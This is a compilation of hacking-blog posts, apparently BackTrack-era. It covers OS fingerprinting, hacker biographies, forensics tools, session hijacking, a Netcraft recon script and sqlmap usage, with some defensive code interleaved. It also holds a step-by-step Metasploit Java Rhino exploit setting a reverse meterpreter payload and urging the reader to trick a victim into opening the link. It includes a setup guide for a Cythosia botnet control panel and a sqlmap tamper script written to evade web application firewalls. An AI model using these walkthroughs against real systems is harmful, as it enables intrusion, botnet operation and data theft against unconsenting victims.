
Banner Grabbing - Backtrack


 Banner Grabbing - OS Detection 


OS Fingerprinting

After we know that the target machine is live, we can find out which operating system it runs. This technique is commonly known as Operating System (OS) fingerprinting. So today I will show you how to find out which operating system your target is using.



XPROBE 2

xprobe2 is an OS fingerprinting tool. It fingerprints operating systems using fuzzy signature matching, probabilistic guesses, multiple simultaneous matches, and a signature database. You need to run xprobe2 with root privileges because it uses a raw socket to send its probes. To access xprobe2:



1. root@root# xprobe2

Run it in your console without arguments and it prints the xprobe2 usage text, which also shows the version you are using (BackTrack 5 R1 ships xprobe2).


Currently, xprobe2 has the following modules:

• icmp_ping: ICMP echo discovery module
• tcp_ping: TCP-based ping discovery module
• udp_ping: UDP-based ping discovery module
• ttl_calc: TCP and UDP based TTL distance calculation
• portscan: TCP and UDP PortScanner
• icmp_echo: ICMP echo request fingerprinting module
• icmp_tstamp: ICMP timestamp request fingerprinting module
• icmp_amask: ICMP address mask request fingerprinting module
• icmp_port_unreach: ICMP port unreachable fingerprinting module
• tcp_hshake: TCP Handshake fingerprinting module
• tcp_rst: TCP RST fingerprinting module
• smb: SMB fingerprinting module
• snmp: SNMPv2c fingerprinting module

For fingerprinting a remote machine, you can just call xprobe2 and give the remote machine IP address or hostname as the argument:


2. root@root# xprobe2 192.168.1.4 
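The flip side of the modules listed above, as an added example (not part of xprobe2 or the original post): the icmp_tstamp and icmp_amask probes use ICMP request types that normal traffic almost never carries, so a defender can spot a fingerprinting run in a capture, and the same initial-TTL assumption ttl_calc makes gives the sender's hop distance. The packet records are constructed, not a real capture.

```python
"""Spot xprobe2-style OS fingerprinting probes and estimate sender distance.

Constructed example: the packet records below are made up, not captured.
"""
from collections import defaultdict

# ICMP request types used by xprobe2's icmp_echo, icmp_tstamp and icmp_amask
# modules. Timestamp (13) and address mask (17) requests are rare in normal use.
ICMP_ECHO_REQUEST = 8
ICMP_TIMESTAMP_REQUEST = 13
ICMP_ADDRESS_MASK_REQUEST = 17
FINGERPRINT_PROBE_TYPES = {
    ICMP_ECHO_REQUEST, ICMP_TIMESTAMP_REQUEST, ICMP_ADDRESS_MASK_REQUEST,
}

# Initial TTL defaults of common operating systems; the ttl_calc module makes
# the same assumption when it estimates how far away a host is.
COMMON_INITIAL_TTLS = (32, 64, 128, 255)


def guess_initial_ttl(observed_ttl):
    """Return (likely initial TTL, hop distance) for an observed IP TTL.

    The initial TTL is the smallest common default >= the observed value.
    """
    if not 0 < observed_ttl <= 255:
        raise ValueError("TTL must be in 1..255")
    for initial in COMMON_INITIAL_TTLS:
        if observed_ttl <= initial:
            return initial, initial - observed_ttl
    raise AssertionError("unreachable: 255 is always a candidate")


def flag_fingerprinting_sources(packets, min_types=2):
    """Return sources that sent at least `min_types` distinct ICMP probe types.

    `packets` is an iterable of dicts with keys src, dst, proto, icmp_type, ttl.
    A lone ping is normal; echo + timestamp + address-mask requests from one
    host within a short capture is the signature of an OS fingerprinting run.
    """
    seen = defaultdict(set)
    for pkt in packets:
        if pkt["proto"] == "icmp" and pkt["icmp_type"] in FINGERPRINT_PROBE_TYPES:
            seen[pkt["src"]].add(pkt["icmp_type"])
    return sorted(src for src, types in seen.items() if len(types) >= min_types)


# Constructed sample: 10.0.0.5 sends all three probes at 10.0.0.20,
# 10.0.0.9 only pings once, 10.0.0.20 answers with an echo reply (type 0).
SAMPLE_PACKETS = [
    {"src": "10.0.0.5", "dst": "10.0.0.20", "proto": "icmp", "icmp_type": 8, "ttl": 63},
    {"src": "10.0.0.5", "dst": "10.0.0.20", "proto": "icmp", "icmp_type": 13, "ttl": 63},
    {"src": "10.0.0.5", "dst": "10.0.0.20", "proto": "icmp", "icmp_type": 17, "ttl": 63},
    {"src": "10.0.0.9", "dst": "10.0.0.20", "proto": "icmp", "icmp_type": 8, "ttl": 126},
    {"src": "10.0.0.20", "dst": "10.0.0.5", "proto": "icmp", "icmp_type": 0, "ttl": 64},
]

if __name__ == "__main__":
    for src in flag_fingerprinting_sources(SAMPLE_PACKETS):
        ttl = next(p["ttl"] for p in SAMPLE_PACKETS if p["src"] == src)
        initial, hops = guess_initial_ttl(ttl)
        print(f"{src}: fingerprinting probes seen; initial TTL ~{initial}, {hops} hop(s) away")
```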



Top FAMOUS HACKERS


FAMOUS HACKERS ALL TIMES


KEVIN MITNICK


BORN:- 6 AUGUST 1963 (LOS ANGELES) USA.

CURRENT OCCUPATION:- COMPUTER SECURITY CONSULTANT, AUTHOR.

WEBSITE:- www.kevinmitnick.com


LIFE SUMMARY :- He had a very unhappy childhood as his parents were divorced. He was a shy, lonely, overweight kid who had problems making friends. His first illegal act was to bypass the punch card system, which allowed him to travel on any bus in LOS ANGELES for free. In high school he was introduced to phreaking, the practice of studying, experimenting with and manipulating telecommunication systems, which he used for making free long distance calls. He gained his first unauthorized access to a computer network in 1979, at the age of 16, breaking into the network of DIGITAL EQUIPMENT CORPORATION. Later he hacked into Pacific Bell's voice mail computers, which led to a warrant for his arrest; he fled and was a fugitive for two and a half years. During those years he broke into the computer networks of many reputed companies, using just a laptop and cloned cellular phones to hide his location, but he made the great mistake of breaking into the computer of security expert Tsutomu Shimomura, who became determined to find the intruder. With Shimomura's help the FBI arrested Mitnick on February 15, 1995 at an apartment in Raleigh, North Carolina. For his illegal computer exploits he served five years in prison and was released on January 21, 2000. He now runs MITNICK SECURITY CONSULTING LLC, a computer security consultancy.
Names of some famous computer networks hacked by Kevin Mitnick :- FBI, PENTAGON, NOKIA, MOTOROLA, SUN MICROSYSTEMS, FUJITSU SIEMENS.

BOOKS AUTHORED :-
THE ART OF DECEPTION
THE ART OF INTRUSION

A movie, "Takedown", was released about the chase for Kevin Mitnick; it was based on the book "Takedown" by John Markoff and Tsutomu Shimomura.



ADRIAN LAMO 

BORN:- 20 feb 1981 (Boston) USA.
NICKNAME:- "DOCTOR" and "HOMELESS HACKER".
CURRENT ACTIVITIES:- THREAT ANALYST AND JOURNALIST.

ADRIAN LAMO, popularly called the "homeless hacker" for his transient lifestyle, was a former grey hat hacker. He performed many authorized and unauthorized network vulnerability assessments for several high profile companies and firms. In 2003 he was arrested for hacking into the internal networks of "THE NEW YORK TIMES". Adrian Lamo's style was very different from that of other famous hackers. Unlike most expert hackers he did not have excellent programming skills or higher education; his secret of success was his ability to get into the mindset of the architect of a security system and take advantage of the mistakes they made. Recently he was under much criticism from the hacker community for giving authorities information about Bradley Manning (a US army soldier under arrest for allegedly leaking US cables to WikiLeaks).

Popular companies penetrated :- MICROSOFT, THE NEW YORK TIMES, YAHOO!, LEXIS-NEXIS, MCI WORLDCOM .




KEVIN POULSEN

Born:- 1965 (Pasadena, California)
Nickname:- "Dark Dante"
Current occupation:- Senior Editor at Wired news.

Website:- www.kevinpoulsen.com 
Blog:- Threat Level 

Kevin Poulsen is one of the most famous hackers in the world. His hacking career began at the age of 17 when he hacked into the US Defence's ARPANET using his TRS-80 computer. He had a day job, first at Stanford Research Institute (SRI) and then at Sun Microsystems; the hacking took place mainly at night. During those days he carried out many high-tech stunts which made him one of the best known cyber criminals. In 1988 Kevin got in trouble with the FBI, when the authorities came to know that he had hacked the database on the federal investigation of Philippine dictator Ferdinand Marcos. The FBI got a warrant issued against him, due to which he fled underground and became a fugitive. During this run from the authorities he carried out one of his best known hacks, taking over all the telephone lines of Los Angeles radio station KIIS-FM to ensure he would be the 102nd caller and win the prize (a Porsche 944 S2). Another interesting incident came when he was featured on NBS's Unsolved Mysteries: dramatically, when his photo was shown on the show, the show's 1-800 phone lines crashed. He was arrested in 1991 when supermarket employees recognized him. He pleaded guilty to 7 counts of mail, computer and wire fraud, obstruction of justice, money laundering etc. He was sentenced to 51 months in prison and ordered to pay $56,000 in restitution.
After being released he worked as a journalist at SecurityFocus, where he enjoyed considerable success in the job. He became the senior editor of Wired News in June 2005, where he currently remains. A biography of Kevin, "The Watchman: The Twisted Life and Crimes of Serial Hacker Kevin Poulsen" by Jon Littman, was published.
In October 2006 he again came into the limelight when he released information about his successful search for sex offenders using MySpace. His work identified 744 registered persons with MySpace profiles, and led to the arrest of one, Andrew Lubrano.

Note: These are not the topmost hackers; they are among the most famous hackers.


Backtrack java rhino exploit

Browser Java Rhino exploit Tutorial


We are going to pwn Windows 7 with a Java exploit called the JAVA RHINO exploit. Here I quote from the Armitage console's description of the exploit: "This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary code outside of the sandbox." The vulnerability affects version 7 and earlier versions, and should work in any browser: Firefox, Safari, Internet Explorer, Google Chrome, etc.
First of all, you have to update the Metasploit SVN checkout with the command #msfupdate, to make sure that the above exploit is included in your BackTrack exploit database. Then run:

#msfconsole

Then use this exploit:


#use exploit/multi/browser/java_rhino


Next set payload:


#set payload/java/meterpreter/reverse/tcp





At this level, type these commands, the first one is meant to set up the server:


#set srvhost 192.168.1.6

In this case 192.168.1.6 is my internal IP; you have to replace this value with your own IP. If you don't know how to get your IP address, just open a terminal and type: #ifconfig. The next command defines the port of the server, which is usually port 80.


#set srvport 80

Next command is for setting up the path of the exploit:


#set uripath java_rhino

# set lhost 192.168.1.6


#set lport 443





Notice also that the srvhost & the lhost have the same ip address. Finally, type this command and wait for a connection:



#exploit







A link has been generated: Local IP://192.168.1.6:80/java_rhino. You have to copy the link and send it to your victim. Once you succeed in "social engineering" the victim into opening the link, the sending stage starts, and you'll have a Java Meterpreter session.






A meterpreter session will be created.
That's it Windows 7 is pwned  =)


Setup cythosia Bot

Tutorial to install cythosia Bot



Requirements:
- Cythosia bot,
- A web host on http://www.000webhost.com/ or any other web host but this one is for free.


First Step:
Log in to your web host account, or register and then log in. The website takes you to a page headed "List of your domains."
Click on "go to cPanel" for the domain you've just made.


Second Step:
Scroll down the new page that is open and click on "File Manager" in the " Files" section.
note: If the site asks for a login, enter the password of your account.
Having a new page open, Open the document called " public_html",
There, Click the upload button,
You'll be redirected to a page where is:
Files
Files entered here will be transferred to the FTP server.
And
Archives (zip, tar, tgz, gz)
Archives entered here will be decompressed, and the files inside will be transferred to the FTP server.
- Under the archives section, click "Choose File" and choose the "webPanel" zip archive that was produced when you extracted the download. After that click the check mark above "Upload to directory" and wait a few seconds.


Third Step:
Return back to the first page of the File manager.
Now, to configure the files you've just uploaded so the bot can work, enter the webpanel folder on your web host, select all the files in it and click on Chmod. You are redirected to "Chmod directories and files"; there change the Chmod value of the files to 777 and click the check mark button.


Fourth Step:
Now you can exit the window you are in and return to the members area ("Cpanel"). There scroll down until you see "» Software / Services"; inside that section, click the one named "MySQL".
Create a new database with the username, database name and password you want, but keep them in your mind or save them somewhere.


Fifth Step:
Return to the CPanel and click "phpMyAdmin" in the same section as MySQL. Press "Enter phpMyAdmin" for the database you've just created. A new window will open; in it click Import. The file to choose is the one named dump, located in the Webpanel folder that you extracted at the beginning; select it and press "GO". After doing that, you can close that window.


Sixth Step:
Get Back to the Cpanel and press file manager again, Navigate to:
/public_html/Botnet/Webpanel/admin/inc
And Edit the config.php file, Edit it with the details of the Mysql Database, username and password you've just created.
Finally, save the file and exit the window.


Seventh Step:
Enter the domain of your webhost, you'll get to put a password, Type in " admin ".


*Creating a bot:
To create your bot just Open " CythBuilder " and change the " Domain " thing to your domain. After that you can change " 1.0.6 [beta] [23-03-2011]" to a name of your choice. And the " Drop Name.exe " to the file name you want to appear.

Extract the file you just downloaded to your desktop.







ANTI FORENSICS ~ Tool


DIGITAL ANTI FORENSICS




Digital Anti Forensics

Install truecrypt

This script is used to install TrueCrypt, software that creates encrypted containers using various encryption ciphers. It offers features such as hidden volumes inside the encrypted container, and the ability to use key files as well as text passwords as keys to the container.



Digital Forensics

hexedit

hexedit is a program that lets the user view a file in hexadecimal and ASCII. It can read a device as a file. It includes built-in key shortcuts to make it fast and easy to edit and analyze files, including jumping to specific offsets, cutting and pasting, and changing views and modes, with key bindings similar to those of emacs.

Example usage: hexedit [filename]


RAM FORENSICS TOOLS - BACKTRACK


RAM FORENSICS TOOLS IN BACKTRACK



pdfbook.py

pdfbook.py is a utility that gathers information relating to Facebook from a process dump. On a Windows system, run “pd -p [pid] > file.dump” where [pid] is the process ID of a browser, then on a Linux system run “strings -el file.dump > fbookstrings”. Finally, we use pdfbook.py on the fbookstrings file resulting from the strings command.
Example Usage: pdfbook.py -f fbookstrings


pdgmail

pdgmail.py is a utility similar to pdfbook.py, but instead of gathering Facebook information from process dumps, it gathers Gmail information. On a Windows system, run “pd -p [pid] > file.dump” where [pid] is the process ID of a browser, then on a Linux system run “strings -el file.dump > gmailstrings”. Finally, we use pdgmail.py on the gmailstrings file resulting from the strings command.

Example Usage: pdgmail.py -f gmailstrings
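The pipeline behind pdfbook.py and pdgmail.py, as an added example (not the tools' own code): the `strings` and `strings -el` passes pull ASCII and 16-bit little-endian text out of a raw process dump, and a pattern search then picks out webmail artifacts. The dump bytes here are constructed, and the artifact patterns are my own simplification.

```python
"""Recover printable strings from a process dump and pick out webmail artifacts.

Stand-in for `strings file.dump` / `strings -el file.dump` followed by the
pattern search pdfbook.py and pdgmail.py perform. The dump is constructed.
"""
import re

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")


def extract_strings(data, min_len=4):
    """Return (ascii_strings, utf16le_strings) found in a raw dump.

    Browser processes on Windows hold most UI text as UTF-16LE, so a plain
    ASCII pass (every other byte is 0x00) misses it; that is why the write-up
    runs `strings -el` as well. Both passes use printable runs >= min_len.
    """
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    ascii_strs = [m.decode("ascii") for m in ascii_re.findall(data)]
    utf16_strs = [m.decode("utf-16-le") for m in utf16_re.findall(data)]
    return ascii_strs, utf16_strs


def find_webmail_artifacts(strings):
    """Collect e-mail addresses and Gmail-related lines from extracted strings."""
    found = set()
    for s in strings:
        found.update(EMAIL_RE.findall(s))
        if "mail.google.com" in s or "/mail/" in s:
            found.add(s.strip())
    return sorted(found)


# Constructed dump: binary noise, an HTTP request in ASCII, a UTF-16LE window
# title and a UTF-16LE address, separated by non-printable bytes.
SAMPLE_DUMP = (
    b"\x00\x01\x02MZ\x90\x00"
    + b"GET /mail/u/0/ HTTP/1.1\r\nHost: mail.google.com\r\n"
    + b"\xff\xfe"
    + "Compose - alice.smith@example.com - Gmail".encode("utf-16-le")
    + b"\x00\x00\x7f\x11\x01"
    + "bob@example.org".encode("utf-16-le")
    + b"\x00"
)

if __name__ == "__main__":
    ascii_strs, utf16_strs = extract_strings(SAMPLE_DUMP)
    for artifact in find_webmail_artifacts(ascii_strs + utf16_strs):
        print(" |-", artifact)
```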


PTK

PTK is a forensics toolkit, similar to the Sleuthkit toolkit. It contains built in modules in order to analyze nearly any type of media or filetype that may be encountered in a forensics investigation. It is browser based, and first needs to have a MySQL database configured. Leave all fields as default, and use the password “toor” for the root user in MySQL. It should setup successfully, at which point you need to register for the free version. Copy the license file you received into the config directory for PTK located at /var/www/ptk/config.

Next, log in as either admin or investigator, and open a new case. Fill out the necessary information, then add an image file to begin. It can even be a RAM dump. From here, the built in tools will help you pull information from the image(s).


Volatility

Volatility is a framework written in Python that specializes in RAM analysis. The Volatility Framework can analyze volatile memory dumps from any system type, and can provide deep insight into the state of the system while it was running. The Volatility Framework has been tested on Windows, OS X, Linux, and even Cygwin. In the example below, we use Volatility to list the processes that were running on the system when the RAM image ram.img was taken.

Example Usage: volatility pslist -f ram.img

Session hijacking methodes


When a user logs in to an account, a session with that account starts, and the session ends at log out. In a running session the user is given a session ID, a unique identifier of the user for that session which is valid only for that session. Session hijacking is the type of attack in which the attacker gains access to the session ID and uses it to obtain unauthorized access to information or services; in web applications the session ID is maintained in cookies. Session hijacking is a simple method to take over someone's account, such as Facebook, Gmail, Hotmail, Twitter etc. Session hijacking relies on cookies.

Session hijacking can be done at 2 levels:

  1. Network level (TCP and UDP session hijacking)
  2. Application level (HTTP session hijacking)


Network level (TCP and UDP session hijacking)

     TCP session hijacking
TCP session hijacking is when an attacker takes over a TCP session between two machines. Since most authentication only occurs at the start of a TCP session, this allows the attacker to gain access to a machine. It can be done in the following ways:

IP Spoofing: Assuming the identity
Man in the Middle attack using Packet Sniffers
Blind attacks, which involve brute-forcing the session ID.


     UDP session hijacking
It is similar to TCP session hijacking but easier than that because UDP does not use packet sequencing and synchronizing.

Application level hijacking
In HTTP session hijacking the attacker tries to get hold of the session ID that identifies the user during the session. HTTP is stateless, so the session ID has to accompany each request. If the attacker obtains the session ID, he can hijack the victim's session. Ways to obtain it:

  1. XSS
  2. Man in the middle attack
  3. Bruteforcing session id
  4. Man in the browser attack
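The server-side counterpart to the list above, as an added example (not from the original post): IDs with enough entropy to defeat brute forcing, cookie flags that block script access (XSS) and cleartext capture, and a client binding so a stolen ID replayed from elsewhere is detected and revoked. The SessionStore class and its toy in-memory store are my own construction.

```python
"""Session handling that resists the hijacking routes listed above.

Added example with an in-memory store. Mitigations shown: unguessable IDs
(brute forcing), HttpOnly/Secure cookie flags (XSS theft, sniffing), and
binding a session to the client so a stolen ID used elsewhere is noticed.
"""
import hashlib
import hmac
import secrets

SESSION_ID_BYTES = 32  # 256 bits of entropy: guessing a live ID is infeasible


def client_fingerprint(ip, user_agent):
    """Hash of client attributes a hijacker replaying a stolen ID rarely matches.

    Caveat: mobile clients change IP often; bind on User-Agent alone or on a
    coarse IP prefix if that causes false alarms.
    """
    return hashlib.sha256(f"{ip}|{user_agent}".encode()).hexdigest()


def cookie_header(session_id):
    """Set-Cookie value: HttpOnly keeps scripts (XSS) away, Secure keeps it off cleartext."""
    return f"session={session_id}; HttpOnly; Secure; SameSite=Strict; Path=/"


def expected_guesses(id_bits, live_sessions):
    """Average guesses before hitting any one of `live_sessions` valid IDs.

    A 4-digit numeric ID (~13 bits) with 100 users falls in a few dozen tries;
    a 256-bit ID does not fall at all.
    """
    return (2 ** id_bits) // (2 * max(live_sessions, 1))


class SessionStore:
    def __init__(self):
        self._sessions = {}

    def create(self, user, ip, user_agent):
        sid = secrets.token_urlsafe(SESSION_ID_BYTES)
        self._sessions[sid] = {"user": user, "fp": client_fingerprint(ip, user_agent)}
        return sid

    def resolve(self, sid, ip, user_agent):
        """Return (user, status); status is 'ok', 'unknown' or 'hijack_suspected'.

        A binding mismatch revokes the session instead of serving it, so the
        legitimate user has to log in again and the stolen ID is dead.
        """
        entry = self._sessions.get(sid)
        if entry is None:
            return None, "unknown"
        if not hmac.compare_digest(entry["fp"], client_fingerprint(ip, user_agent)):
            del self._sessions[sid]
            return None, "hijack_suspected"
        return entry["user"], "ok"


def demo():
    """Legitimate use from the original client, then replay from another host."""
    store = SessionStore()
    sid = store.create("alice", "203.0.113.10", "Mozilla/5.0 (X11; Linux)")
    legit = store.resolve(sid, "203.0.113.10", "Mozilla/5.0 (X11; Linux)")
    stolen = store.resolve(sid, "198.51.100.7", "curl/8.0")
    return legit, stolen


if __name__ == "__main__":
    print(demo())
    print(cookie_header("<id>"))
```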

Netcraft Dns Search Engine


DNS Results From Netcraft Search Engine

The following Python script is dedicated to CHC members. It obtains DNS results from the Netcraft search engine and can be used in the information gathering stage of a penetration test. You can find the source code and a screenshot of the script in use below:

#!/usr/bin/env python3
# netcraftdns v1.0 - by neuro [0x0lab.org]
# Queries searchdns.netcraft.com for hostnames ending in a domain and prints them.
# Indentation restored; ported from httplib to http.client (the original used
# plain HTTP). Results depend on the current layout of Netcraft's search page.
import http.client
import re
import sys

HOST = 'searchdns.netcraft.com'
USER_AGENT = ('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) '
              'Gecko/2008102920 Firefox/3.0.4')

netcraftres = []   # unique hostnames found so far
nres = 0           # total number of results reported by Netcraft


def help():
    print("[netcraftdns v1.0] - by neuro [0x0lab.org]")
    print("\nUsage: python netcraftdns.py <domain_name> \n")
    sys.exit()


def fetch(path):
    """GET one Netcraft search page; return the body, or None on a non-200 reply."""
    conn = http.client.HTTPSConnection(HOST)
    conn.request('GET', path, headers={'Host': HOST, 'User-Agent': USER_AGENT})
    resp = conn.getresponse()
    if resp.status != 200:
        print('Error Sending Request', resp.status, resp.reason)
        return None
    return resp.read().decode('utf-8', 'replace')


def count(domain_name):
    """Read the 'Found N' total from the first results page into nres."""
    global nres
    rgdata = fetch("/?restriction=site+ends+with&host=" + domain_name)
    if rgdata is None:
        return
    for total in re.findall(r'Found ([0-9]+)', rgdata, re.I):
        nres = int(total)   # the original kept this as a string and compared it to an int
    print("[+]-Total Netcraft Results:", nres)


def results(domain_name):
    """Collect hostnames from the first page, then page through the rest 20 at a time."""
    # escape the domain and require a literal dot before it (the original '.' matched anything)
    pattern = re.compile(r'[\w\.\-]+\.' + re.escape(domain_name), re.I)
    rgdata = fetch("/?restriction=site+ends+with&host=" + domain_name)
    if rgdata is None:
        return
    for netres in pattern.findall(rgdata):
        if netres not in netcraftres:
            netcraftres.append(netres)
            print(" |-", netres)
    y = 21
    while y < nres and netcraftres:
        rgdata1 = fetch("/?host=*." + domain_name + "&last=" + netcraftres[-1]
                        + "&from=" + str(y) + "&restriction=site%20contains&position=")
        if rgdata1 is None:
            break
        for netres1 in pattern.findall(rgdata1):   # original used the first page's regex here too
            if netres1 not in netcraftres:
                netcraftres.append(netres1)
                print(" |-", netres1)
        y = y + 20


if len(sys.argv) != 2:
    help()
domain_name = sys.argv[1]
count(domain_name)
results(domain_name)

netcraftdns - Sample Results

Advance Sqlmap Commands


Advance Sqlmap tutorial







1. When you have the target URL but are not sure whether any parameter in that request is vulnerable, sqlmap can act as a scanner. The syntax for a GET request is as follows:

./sqlmap.py -u "http://www.site.com/oldman.php?id=5&text=dummy"

The syntax for a POST request is as follows:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy"

This will tell you whether either of the variables (id, text) is vulnerable to SQL injection. Note: throughout this tutorial we will use the POST request as the example. The only difference between the GET and POST syntax is that the POST request has an additional switch (--data) carrying your POST parameters and their values.

2. When you suspect that a particular parameter might be vulnerable to SQL injection, you can name that parameter with the -p switch. The syntax is as follows:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id"

sqlmap will then only check whether the parameter "id" is injectable.

3. If the page described in the last scenarios (i.e. 1, 2) is only available after the user authenticates with the application, the steps are as follows:
a) Log in to the application.
b) Note down all the cookie names and their values. Let us assume that the cookies generated are cookie1=dummy_val1, cookie2=dummy_val2.
c) Use sqlmap's --cookie switch to replay these cookies along with the sqlmap requests. The syntax will be as follows:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --cookie="cookie1=dummy_val1;cookie2=dummy_val2"

4. To get information about the backend database, such as its version, the current database name and the database user, the syntax is:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --current-db --current-user

5. To get the tables of the dummydb database, the syntax is:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --tables -D "dummydb"


6. To get the columns of the admin table, the syntax is:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --columns -T "admin"


7. When you know the backend database product (mssql, mysql, oracle, etc.), you can specify it with the --dbms switch. This tells sqlmap not to try queries meant for other databases, which speeds up the injection process.

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --dbms="oracle"

8. If the application is protected by a web application firewall (WAF), you can try the various tamper scripts to get past the WAF's detection. There are almost 30 such tamper scripts available. To apply one or more of them, use the --tamper switch. The syntax is:

./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --tamper="tamper_script1_name.py,tamper_script2_name.py"

All the available tamper scripts can be found in the tamper directory inside the sqlmap root directory.


9. Writing your own tamper script. There are cases where the application has a very weak detection signature but none of the existing tamper scripts does the job. For example, if the application code detects "UNION SELECT" but not "UNION SELEcT", sqlmap will not be able to inject that target, because all of sqlmap's payloads look like "UNION ALL SELECT", "WAITFOR DELAY", etc. So let us create our own tamper script. The format of any tamper script is as follows:



# Needed imports
from lib.core.enums import PRIORITY

# Define the order in which this tamper script is applied to the payload
__priority__ = PRIORITY.NORMAL


def tamper(payload, **kwargs):
    """Description of your tamper script"""
    retVal = payload
    # your code to tamper the original payload
    # return the tampered payload
    return retVal




Based on the above tamper script format, our script will be

#!/usr/bin/env python
"""
Sample script by oldmanlab.
Email : oldmanlab@gmail.com
"""
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def tamper(payload, **kwargs):
    """
    Changes the case of one letter in the first "ALL SELECT" of the payload.

    INPUT          : UNION ALL SELECT
    OUTPUT         : UNION ALL SELEcT
    TESTED AGAINST : mysql 5.x.x
    """
    retVal = payload
    if payload:
        retVal = ""
        for i in range(len(payload)):
            if payload[i:i+10] == "ALL SELECT":
                # append the altered keyword plus the rest of the payload and stop
                retVal += "ALL SELEcT" + payload[i+10:]
                break
            retVal += payload[i]  # the original wrote "retval" here (NameError)
    return retVal
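The defender's view of item 9, as an added example that is not part of the tutorial: the case-sensitive substring check described there is bypassed exactly as the tamper script intends, a check that normalises case and whitespace before matching is not, and a parameterised query removes the problem entirely because the payload is never interpreted as SQL. Function names and the sqlite3 demo table are my own.

```python
"""Why the case-change tamper works against a naive signature, and what closes it.

Added example. Signature matching is only a speed bump; the parameterised
query at the end is the actual fix, whatever casing the payload uses.
"""
import re
import sqlite3

SIGNATURES = ("UNION SELECT", "UNION ALL SELECT", "WAITFOR DELAY")


def naive_waf_blocks(payload):
    """Case-sensitive substring match: the weak detection the tutorial describes."""
    return "UNION SELECT" in payload


def normalise(payload):
    """Collapse whitespace and fold case before matching signatures."""
    return re.sub(r"\s+", " ", payload).upper()


def normalising_waf_blocks(payload):
    """Same signatures, applied to the normalised payload; case tricks no longer help."""
    text = normalise(payload)
    return any(sig in text for sig in SIGNATURES)


def build_demo_db():
    """Constructed sqlite3 table standing in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("5", "oldman"), ("7", "admin")])
    return conn


def lookup_user_safely(conn, user_id):
    """Parameterised query: user_id is bound as data, never spliced into SQL."""
    cur = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,))
    return [row[0] for row in cur.fetchall()]


# The payload the tutorial's signature catches, and the one its tamper script emits.
PAYLOADS = {
    "plain": "5 UNION SELECT user,pass FROM admin",
    "case": "5 UNION SELEcT user,pass FROM admin",
}

if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(f"{name:6} naive={naive_waf_blocks(payload)!s:5} "
              f"normalising={normalising_waf_blocks(payload)}")
    conn = build_demo_db()
    print("parameterised lookup with tampered payload:",
          lookup_user_safely(conn, PAYLOADS["case"]))
```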


